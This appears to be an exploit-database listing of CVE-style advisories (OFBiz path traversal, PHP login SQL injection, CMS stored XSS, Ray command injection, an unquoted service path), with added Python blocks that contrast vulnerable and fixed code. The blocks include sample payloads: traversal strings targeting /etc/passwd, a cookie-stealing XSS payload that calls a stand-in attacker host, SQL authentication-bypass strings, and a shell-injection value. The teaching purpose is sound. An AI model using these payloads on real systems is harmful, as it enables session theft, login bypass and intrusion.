Text Exploits
31,383 exploits tracked across all sources.
Apache OFBiz <18.12.13 - Path Traversal
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz before 18.12.13.
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
by Abdualhadi khalifa
CVSS 9.8
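The OFBiz entry above is a CWE-22 bug: a user-supplied path is joined to a server directory without checking that the result stays inside it. The block below is an added example, not OFBiz code, showing the naive join next to a checked resolver that decodes, normalises and then proves the candidate is still under the root. The web root and request strings are constructed for the example; nothing is read from disk.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed web root for the example; the strings below are never touched on disk.
WEB_ROOT = "/srv/app/webroot"


def resolve_vulnerable(user_path: str, root: str = WEB_ROOT) -> str:
    """Naive join + normalise: '..' segments and absolute paths escape the root."""
    # posixpath.join discards root entirely when user_path is absolute,
    # and normpath happily collapses '..' past the root directory.
    return posixpath.normpath(posixpath.join(root, user_path))


def resolve_checked(user_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Decode, normalise, then verify the result is still under root.
    Returns None for any request that would leave the directory."""
    decoded = user_path
    for _ in range(2):               # tolerate double-encoding such as %252e%252e%252f
        decoded = unquote(decoded)
    if "\x00" in decoded:            # NUL truncates paths in C-backed APIs; reject outright
        return None
    # Treat backslashes as separators and leading slashes as relative to the root.
    decoded = decoded.replace("\\", "/").lstrip("/")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # The containment check is done after normalisation, so '..' has already been applied.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def check_requests(paths):
    """Map each request path to (naive result, checked result) for side-by-side comparison."""
    return {p: (resolve_vulnerable(p), resolve_checked(p)) for p in paths}


if __name__ == "__main__":
    # Constructed sample requests: one benign, the rest traversal attempts in various encodings.
    for req, (bad, good) in check_requests([
        "images/logo.png",
        "../../../etc/passwd",
        "/etc/passwd",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "..%252f..%252f..%252fetc/passwd",
        "logo.png%00.jpg",
    ]).items():
        print(f"{req!r:45} naive={bad!r:35} checked={good!r}")
```

The order matters: decode first, normalise second, compare last. Comparing before normalising (or checking only for the literal string "..") is what leaves the double-encoded and backslash variants open.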
Prison Management System Using PHP 1.0 - SQL Injection
Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username field on the Admin login page.
by Sanjay Singh
CVSS 7.3
Chyrp 2.5.2 - Authenticated Stored Cross-Site Scripting via Post Title
Chyrp 2.5.2 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into post titles. Attackers can craft payloads in the title field that will execute when the post is viewed by other users, potentially stealing session cookies or performing client-side attacks.
by Ahmet Ümit BAYRAM
CVSS 5.4
PyroCMS v3.0.1 - Stored Cross-Site Scripting via Admin Redirects Configuration
PyroCMS v3.0.1 contains a stored cross-site scripting vulnerability in the admin redirects configuration that allows attackers to inject malicious scripts. Attackers can insert a payload in the 'Redirect From' field to execute arbitrary JavaScript when administrators view the redirects page.
by tmrswrr
CVSS 5.4
CE Phoenix - Stored Cross-Site Scripting in Currencies Administration Panel
CE Phoenix v3.0.1 contains a stored cross-site scripting vulnerability in the currencies administration panel that allows attackers to inject malicious scripts. Attackers can insert XSS payloads in the title field to execute arbitrary JavaScript when administrators view the currencies page.
by tmrswrr
Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
by Ahmet Ümit BAYRAM
iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
by modrnProph3t
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure
by LiquidWorm
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure
by LiquidWorm
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass
by LiquidWorm
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure
by LiquidWorm
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass
by LiquidWorm
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass
by LiquidWorm
WordPress Background Image Cropper 1.2 - Remote Code Execution
WordPress Background Image Cropper version 1.2 contains a remote code execution vulnerability that allows unauthenticated attackers to upload arbitrary files by accessing the ups.php endpoint. Attackers can upload PHP files through the file upload form in the plugin directory to execute arbitrary code on the server.
by Milad karimi
CVSS 9.8
Flowise < 1.6.5 - Remote Code Execution via API v1 Component
An issue in FlowiseAI Inc Flowise v1.6.2 and earlier allows a remote attacker to execute arbitrary code via a crafted script sent to the api/v1 component.
by Maerifat Majeed
CVSS 7.6
Laravel Framework <11 - Info Disclosure
An issue in Laravel Framework 8 through 11 might allow a remote attacker to discover database credentials in storage/logs/laravel.log. NOTE: this is disputed by multiple third parties because the owner of a Laravel Framework installation can choose to have debugging logs, but needs to set the access control appropriately for the type of data that may be logged.
by Huseein Amer
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
A command injection vulnerability, resulting from arbitrary file creation, in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
by Kr0ff
CVSS 10.0
Savsoft Quiz 6.0 - Stored Cross-Site Scripting via Quiz Name Parameter
Savsoft Quiz 6.0 allows stored XSS via the index.php/quiz/insert_quiz/ quiz_name parameter.
by Eren Sen
CVSS 6.1
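The Chyrp, PyroCMS, CE Phoenix and Savsoft Quiz entries above are all the same bug class: a stored field (post title, redirect source, currency title, quiz name) is written back into HTML without output encoding. The block below is an added example, not code from any of those projects. It renders a field into a text node and into an attribute value, once unescaped and once with html.escape, and then parses the result with the standard-library HTML parser to report whether anything executable survived. The payloads are constructed for the example; the attribute case shows why escaping only < > & (quote=False) is not enough inside an attribute.

```python
import html
from html.parser import HTMLParser

# Constructed payloads for the two rendering contexts exercised below.
TITLE_PAYLOAD = "<script>new Image().src='https://attacker.invalid/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_title_vulnerable(title: str) -> str:
    """Stored title dropped straight into a text node, as in the affected apps."""
    return f'<h1 class="post-title">{title}</h1>'


def render_title_escaped(title: str) -> str:
    """Same text node with the five significant characters encoded."""
    return f'<h1 class="post-title">{html.escape(title, quote=True)}</h1>'


def render_field_half_escaped(value: str) -> str:
    """Escapes < > & but not quotes: fine in a text node, breaks out of an attribute."""
    return f'<input type="text" name="quiz_name" value="{html.escape(value, quote=False)}">'


def render_field_escaped(value: str) -> str:
    """Attribute context needs quotes encoded too (quote=True, the default)."""
    return f'<input type="text" name="quiz_name" value="{html.escape(value, quote=True)}">'


class ScriptSink(HTMLParser):
    """Collects constructs a browser would execute: <script> elements, on* handlers, javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler")
            if name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"{name} javascript: URL")


def executable_script(markup: str) -> list:
    """Parse rendered markup the way a browser tokenises it and list what would run."""
    parser = ScriptSink()
    parser.feed(markup)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for label, markup in [
        ("title, unescaped", render_title_vulnerable(TITLE_PAYLOAD)),
        ("title, escaped", render_title_escaped(TITLE_PAYLOAD)),
        ("attribute, quote=False", render_field_half_escaped(ATTR_PAYLOAD)),
        ("attribute, quote=True", render_field_escaped(ATTR_PAYLOAD)),
    ]:
        print(f"{label:24} -> {executable_script(markup) or 'nothing executable'}")
```

The parser-based check is deliberate: a regex for "<script" or " on" would also match inside the correctly escaped attribute, because the encoded payload is still present as text; only tokenising the markup tells you whether it landed in an attribute name or in a value.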
PHPGurukul Online Fire Reporting System 1.2 - SQL Injection via Username Input Field
A SQL Injection vulnerability exists in the `ofrs/admin/index.php` script of PHPGurukul Online Fire Reporting System 1.2. The vulnerability allows attackers to bypass authentication and gain unauthorized access by injecting SQL commands into the username input field during the login process.
by Diyar Saadi
CVSS 9.1
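The Prison Management System and PHPGurukul Online Fire Reporting System entries describe the same authentication bypass: the login script pastes the username into the SQL text, so a quote and a comment marker turn the password check into dead code. The block below is an added example, not code from either project, using an in-memory SQLite table to run the string-built query next to a parameterised one against the classic payloads. The admin row and its plaintext password are constructed to mirror the vulnerable login check; a real system stores a salted hash.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory admin table. Plaintext password only to mirror the
    affected apps' login comparison; real systems store a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL)"
    )
    conn.execute("INSERT INTO admin (username, password) VALUES ('admin', 'Tr0ub4dor&3')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query, as in the affected login scripts: the username becomes SQL syntax."""
    sql = f"SELECT id FROM admin WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the driver passes values separately, so quotes and '--' stay data."""
    sql = "SELECT id FROM admin WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Classic bypass payloads for the username field; the password can be anything.
BYPASS_PAYLOADS = [
    "' OR 1=1 -- ",   # closes the literal, adds an always-true clause, comments out the rest
    "admin' -- ",     # closes the literal after a known username, comments out the password check
]


def run_bypass_attempts(conn: sqlite3.Connection) -> dict:
    """Each payload mapped to (vulnerable login succeeded?, parameterised login succeeded?)."""
    return {
        p: (login_vulnerable(conn, p, "wrong"), login_parameterized(conn, p, "wrong"))
        for p in BYPASS_PAYLOADS
    }


if __name__ == "__main__":
    db = build_demo_db()
    for payload, (vuln, safe) in run_bypass_attempts(db).items():
        print(f"username={payload!r:16} string-built={vuln}  parameterised={safe}")
```

Note the payload uses `OR 1=1 --` rather than the often-quoted `' OR '1'='1`: without the comment, AND binds tighter than OR, so `username='' OR '1'='1' AND password='wrong'` still fails on the password. The comment is what removes the password predicate entirely.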
Terratec DMX_6Fire USB <1.23.0.02 - Privilege Escalation
An unquoted service path vulnerability in Terratec DMX_6Fire USB v1.23.0.02 allows a local attacker to escalate privileges via the Program.exe component.
by Joseph Kwabena Fiagbor
CVSS 6.7
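The Terratec entry is an unquoted service path: when the Service Control Manager starts a service whose ImagePath is unquoted and contains spaces, CreateProcess tries each space-delimited prefix with ".exe" appended before reaching the intended binary, so a writable directory earlier on the path lets a local user plant an executable that runs as the service account. The block below is an added example, not Terratec code or the exploit, that enumerates those candidate paths from an ImagePath string and scans a constructed list of services. The install directory and service name used for the DMX 6Fire are assumptions for illustration, not taken from the advisory.

```python
def hijack_candidates(image_path: str) -> list:
    """Executables CreateProcess would try, in order, before the intended one when the
    ImagePath is unquoted: at every space the prefix is tried with '.exe' appended.
    Returns [] for quoted paths and for paths whose first space is after the .exe."""
    path = image_path.strip()
    if path.startswith('"'):
        return []                           # quoted: the executable name is unambiguous
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break                           # reached the real executable; later tokens are arguments
        candidates.append(prefix + ".exe")
    return candidates


# Constructed sample of (service name, ImagePath) pairs, i.e. what a parsed
# `reg query HKLM\SYSTEM\CurrentControlSet\Services /s /v ImagePath` reduces to.
# The DMX6FireUSB name and install directory are assumptions for the example.
SAMPLE_SERVICES = [
    ("Dhcp", r"C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted"),
    ("SecureVendorSvc", r'"C:\Program Files\Vendor\Secure Svc\vsvc.exe" -service'),
    ("DMX6FireUSB", r"C:\Program Files\TerraTec\DMX 6Fire USB\Program.exe"),
]


def scan_services(services) -> dict:
    """Services whose ImagePath yields at least one hijack candidate, with the ordered candidates."""
    report = {}
    for name, image_path in services:
        candidates = hijack_candidates(image_path)
        if candidates:
            report[name] = candidates
    return report


if __name__ == "__main__":
    for name, candidates in scan_services(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path with spaces; CreateProcess probes in this order:")
        for c in candidates:
            print(f"    {c}")
```

The candidate list is ordered the way Windows probes it, so the first entry whose parent directory is writable by an unprivileged user is the one an attacker would use; root-of-drive entries such as C:\Program.exe are usually not writable, while vendor directories under Program Files sometimes are. Confirming writability still requires checking the ACLs on the live system.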
Ray < 2.8.1 - Unauthenticated Remote Code Execution via CPU Profile URL Parameter
A command injection vulnerability in the cpu_profile URL parameter of the Ray dashboard allowed unauthenticated remote attackers to execute OS commands on the host running the dashboard. The issue is fixed in version 2.8.1 and later. The Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
by Fire_Wolf
CVSS 9.8
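The Ray entry is a URL parameter that ends up inside a shell command line. The block below is an added example, not Ray's code and not a claim about how Ray's fix was written, showing the general pattern: a request parameter interpolated into a string run with shell=True next to a version that validates the parameter as an integer and passes an argument vector with no shell. `echo` stands in for the profiler so the example runs anywhere with a POSIX /bin/sh; the parameter values are constructed.

```python
import subprocess
from typing import Optional

# Constructed request parameters: a benign duration and one carrying a shell metacharacter.
BENIGN_DURATION = "5"
INJECTED_DURATION = "5; echo INJECTED"


def profile_vulnerable(pid: str, duration: str) -> str:
    """Request parameters pasted into a command string and run through the shell.
    Anything after ';' in `duration` becomes a second command."""
    cmd = f"echo profiling pid={pid} duration={duration}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True, check=False).stdout


def profile_argv_only(pid: str, duration: str) -> str:
    """Argument vector, no shell: the payload arrives at the program as one literal argument.
    Removes the injection, but still passes unvalidated input to the tool."""
    argv = ["echo", "profiling", f"pid={pid}", f"duration={duration}"]
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


def profile_hardened(pid: str, duration: str) -> Optional[str]:
    """Validate both parameters as bounded integers, then use an argument vector.
    Returns None (reject the request) on anything that is not a plausible pid/duration."""
    try:
        pid_n, dur_n = int(pid), int(duration)
    except ValueError:
        return None
    if pid_n <= 0 or not 1 <= dur_n <= 300:
        return None
    argv = ["echo", "profiling", f"pid={pid_n}", f"duration={dur_n}"]
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    print("shell string :", repr(profile_vulnerable("1234", INJECTED_DURATION)))
    print("argv only    :", repr(profile_argv_only("1234", INJECTED_DURATION)))
    print("hardened     :", repr(profile_hardened("1234", INJECTED_DURATION)))
    print("hardened, ok :", repr(profile_hardened("1234", BENIGN_DURATION)))
```

Dropping the shell is the change that closes the injection; the integer check is what keeps the parameter from reaching the profiler's own option parser as, for example, a leading "--" flag. Both belong in the fix, and the hardened function's None return is where the request should be refused with a 400 rather than silently defaulted.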
WordPress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
by Erdemstar
WordPress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)
by Erdemstar